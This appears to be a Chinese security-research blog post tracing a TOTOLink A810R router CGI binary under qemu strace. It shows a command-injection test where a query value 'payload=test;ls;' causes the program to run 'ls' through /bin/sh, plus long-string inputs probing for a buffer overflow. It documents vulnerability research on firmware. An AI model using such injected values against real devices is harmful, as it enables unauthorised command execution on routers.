qemu-user strace的调度
awigwu76@awigwu76:~/Desktop/Firmware/TOTOLink/A810R_V4.1.2cu.5182_B20201026/_TOTOLINK_C8180R-1C_A810R_IP04347_8197F_SPI_8M64M_V4.1.2cu.5182_B20201026_ALL.web.extracted/squashfs-root/web_cste/cgi-bin$ QUERY_STRING="payload=test;ls;" qemu-mipsel-static -strace -L ../../ ./downloadFlile.cgi
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ad000
6937 open("/lib/libcjson.so",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d90) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,102400,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2c8000
6937 mmap(0x2b2c8000,36548,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2c8000
6937 mmap(0x2b2e0000,4015,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x8000) = 0x2b2e0000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d80) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,147456,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2e1000
6937 mmap(0x2b2e1000,78092,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2e1000
6937 mmap(0x2b304000,3091,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x13000) = 0x2b304000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d70) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,548864,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b305000
6937 mmap(0x2b305000,449512,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b305000
6937 mmap(0x2b383000,7785,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x6e000) = 0x2b383000
6937 mmap(0x2b385000,22908,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,-1,0) = 0x2b385000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libm.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d60) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 read(3,0x2b2ae000,4096) = 4096
6937 mmap(NULL,159744,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b38b000
6937 mmap(0x2b38b000,93516,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b38b000
6937 mmap(0x2b3b1000,3843,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x16000) = 0x2b3b1000
6937 close(3) = 0
6937 munmap(0x2b2ae000,4096) = 0
6937 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d50) = 0
6937 close(3) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d40) = 0
6937 close(3) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d30) = 0
6937 close(3) = 0
6937 stat("/lib/ld-uClibc.so.0",0x2b2aa6c8) = 0
6937 open("/lib/libc.so.0",O_RDONLY) = 3
6937 fstat(3,0x2b2a9d10) = 0
6937 close(3) = 0
6937 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
6937 set_thread_area(0x2b2b5440) = 0
6937 open("/dev/urandom",O_RDONLY) = 3
6937 read(3,0x2b2aa80c,4) = 4
6937 close(3) = 0
6937 mprotect(0x2b383000,4096,PROT_READ) = 0
6937 mprotect(0x2b2c6000,4096,PROT_READ) = 0
6937 ioctl(0,TCGETS,0x2b2aa6a8) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
6937 ioctl(1,TCGETS,0x2b2aa6a8) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
6937 rt_sigaction(SIGINT,0x2b2a4a90,0x2b3898b0) = 0
6937 rt_sigaction(SIGQUIT,0x2b2a4a90,0x2b3898cc) = 0
6937 rt_sigprocmask(SIG_BLOCK,[SIGCHLD],0x2b2a4a60,16) = 0 (oldset=[])
6937 clone(CLONE_PARENT_SETTID|0x12,child_stack=0x00000000,parent_tidptr=0x2b2a4a5c,tls=0x00000000,child_tidptr=0x2b38c3f0) = 6939
6937 wait4(6939,0x2b2a4a58,0,(nil)) = 0
6939 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
6939 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
6939 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
6939 execve("/bin/sh",{"/bin/sh","-c","echo QUERY_STRING:payload=test;ls; >/tmp/download",NULL})QUERY_STRING:payload=test
cstecgi.cgi ExportSettings.sh upload_bootloader.cgi
downloadFlile.cgi ExportSyslog.sh upload.cgi
ExportIbmsConfig.sh product.ini upload_settings.cgi
6937 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
6937 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
6937 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=NULL} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
段错误
点击查看代码
#无缓冲区溢出
awigwu76@awigwu76:~/Desktop/Firmware/TOTOLink/A810R_V4.1.2cu.5182_B20201026/_TOTOLINK_C8180R-1C_A810R_IP04347_8197F_SPI_8M64M_V4.1.2cu.5182_B20201026_ALL.web.extracted/squashfs-root/web_cste/cgi-bin$ qemu-mipsel-static -strace -L ../../ -E QUERY_STRING=$(printf 'a%.0s' {1..400}) ./downloadFlile.cgi
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ad000
7692 open("/lib/libcjson.so",O_RDONLY) = 3
7692 fstat(3,0x2b2a9c00) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,102400,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2c8000
7692 mmap(0x2b2c8000,36548,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2c8000
7692 mmap(0x2b2e0000,4015,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x8000) = 0x2b2e0000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bf0) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,147456,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2e1000
7692 mmap(0x2b2e1000,78092,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2e1000
7692 mmap(0x2b304000,3091,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x13000) = 0x2b304000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9be0) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,548864,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b305000
7692 mmap(0x2b305000,449512,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b305000
7692 mmap(0x2b383000,7785,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x6e000) = 0x2b383000
7692 mmap(0x2b385000,22908,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,-1,0) = 0x2b385000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libm.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bd0) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 read(3,0x2b2ae000,4096) = 4096
7692 mmap(NULL,159744,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b38b000
7692 mmap(0x2b38b000,93516,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b38b000
7692 mmap(0x2b3b1000,3843,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x16000) = 0x2b3b1000
7692 close(3) = 0
7692 munmap(0x2b2ae000,4096) = 0
7692 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bc0) = 0
7692 close(3) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9bb0) = 0
7692 close(3) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9ba0) = 0
7692 close(3) = 0
7692 stat("/lib/ld-uClibc.so.0",0x2b2aa538) = 0
7692 open("/lib/libc.so.0",O_RDONLY) = 3
7692 fstat(3,0x2b2a9b80) = 0
7692 close(3) = 0
7692 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7692 set_thread_area(0x2b2b5440) = 0
7692 open("/dev/urandom",O_RDONLY) = 3
7692 read(3,0x2b2aa67c,4) = 4
7692 close(3) = 0
7692 mprotect(0x2b383000,4096,PROT_READ) = 0
7692 mprotect(0x2b2c6000,4096,PROT_READ) = 0
7692 ioctl(0,TCGETS,0x2b2aa518) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7692 ioctl(1,TCGETS,0x2b2aa518) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7692 rt_sigaction(SIGINT,0x2b2a4900,0x2b3898b0) = 0
7692 rt_sigaction(SIGQUIT,0x2b2a4900,0x2b3898cc) = 0
7692 rt_sigprocmask(SIG_BLOCK,[SIGCHLD],0x2b2a48d0,16) = 0 (oldset=[])
7692 clone(CLONE_PARENT_SETTID|0x12,child_stack=0x00000000,parent_tidptr=0x2b2a48cc,tls=0x00000000,child_tidptr=0x2b38c3f0) = 7694
7692 wait4(7694,0x2b2a48c8,0,(nil)) = 0
7694 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7694 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7694 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
7694 execve("/bin/sh",{"/bin/sh","-c","echo QUERY_STRING:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >/tmp/download",NULL}) =
7692 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7692 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7692 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x00000001} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
段错误
#有缓冲区溢出
awigwu76@awigwu76:~/Desktop/Firmware/TOTOLink/A810R_V4.1.2cu.5182_B20201026/_TOTOLINK_C8180R-1C_A810R_IP04347_8197F_SPI_8M64M_V4.1.2cu.5182_B20201026_ALL.web.extracted/squashfs-root/web_cste/cgi-bin$ qemu-mipsel-static -strace -L ../../ -E QUERY_STRING=$(printf 'a%.0s' {1..600}) ./downloadFlile.cgi
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ad000
7697 open("/lib/libcjson.so",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b40) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,102400,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2c8000
7697 mmap(0x2b2c8000,36548,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2c8000
7697 mmap(0x2b2e0000,4015,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x8000) = 0x2b2e0000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b30) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,147456,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b2e1000
7697 mmap(0x2b2e1000,78092,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b2e1000
7697 mmap(0x2b304000,3091,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x13000) = 0x2b304000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b20) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,548864,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b305000
7697 mmap(0x2b305000,449512,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b305000
7697 mmap(0x2b383000,7785,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x6e000) = 0x2b383000
7697 mmap(0x2b385000,22908,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED,-1,0) = 0x2b385000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libm.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b10) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 read(3,0x2b2ae000,4096) = 4096
7697 mmap(NULL,159744,PROT_NONE,MAP_PRIVATE|MAP_ANONYMOUS,-1,0) = 0x2b38b000
7697 mmap(0x2b38b000,93516,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_FIXED,3,0) = 0x2b38b000
7697 mmap(0x2b3b1000,3843,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_FIXED,3,0x16000) = 0x2b3b1000
7697 close(3) = 0
7697 munmap(0x2b2ae000,4096) = 0
7697 open("/lib/libgcc_s.so.1",O_RDONLY) = 3
7697 fstat(3,0x2b2a9b00) = 0
7697 close(3) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9af0) = 0
7697 close(3) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9ae0) = 0
7697 close(3) = 0
7697 stat("/lib/ld-uClibc.so.0",0x2b2aa478) = 0
7697 open("/lib/libc.so.0",O_RDONLY) = 3
7697 fstat(3,0x2b2a9ac0) = 0
7697 close(3) = 0
7697 mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS|MAP_UNINITIALIZED,-1,0) = 0x2b2ae000
7697 set_thread_area(0x2b2b5440) = 0
7697 open("/dev/urandom",O_RDONLY) = 3
7697 read(3,0x2b2aa5bc,4) = 4
7697 close(3) = 0
7697 mprotect(0x2b383000,4096,PROT_READ) = 0
7697 mprotect(0x2b2c6000,4096,PROT_READ) = 0
7697 ioctl(0,TCGETS,0x2b2aa458) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7697 ioctl(1,TCGETS,0x2b2aa458) = 0 ({c_iflag = ICRNL|IXON|IUTF8,c_oflag = OPOST|ONLCR,c_cflag = B38400,CS8,CREAD,c_lflag = ISIG|ICANON|ECHO|ECHOE|ECHOK|ECHOCTL|ECHOKE|IEXTEN,c_cc = "",c_line = ''})
7697 rt_sigaction(SIGINT,0x2b2a4840,0x2b3898b0) = 0
7697 rt_sigaction(SIGQUIT,0x2b2a4840,0x2b3898cc) = 0
7697 rt_sigprocmask(SIG_BLOCK,[SIGCHLD],0x2b2a4810,16) = 0 (oldset=[])
7697 clone(CLONE_PARENT_SETTID|0x12,child_stack=0x00000000,parent_tidptr=0x2b2a480c,tls=0x00000000,child_tidptr=0x2b38c3f0) = 7699
7697 wait4(7699,0x2b2a4808,0,(nil)) = 0
7699 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7699 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7699 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
7699 execve("/bin/sh",{"/bin/sh","-c","echo QUERY_STRING:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >/tmp/download",NULL}) =
7697 rt_sigaction(SIGINT,0x2b3898b0,NULL) = 0
7697 rt_sigaction(SIGQUIT,0x2b3898cc,NULL) = 0
7697 rt_sigprocmask(SIG_SETMASK,[],NULL,16) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x00000001} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
段错误
浙公网安备 33010602011771号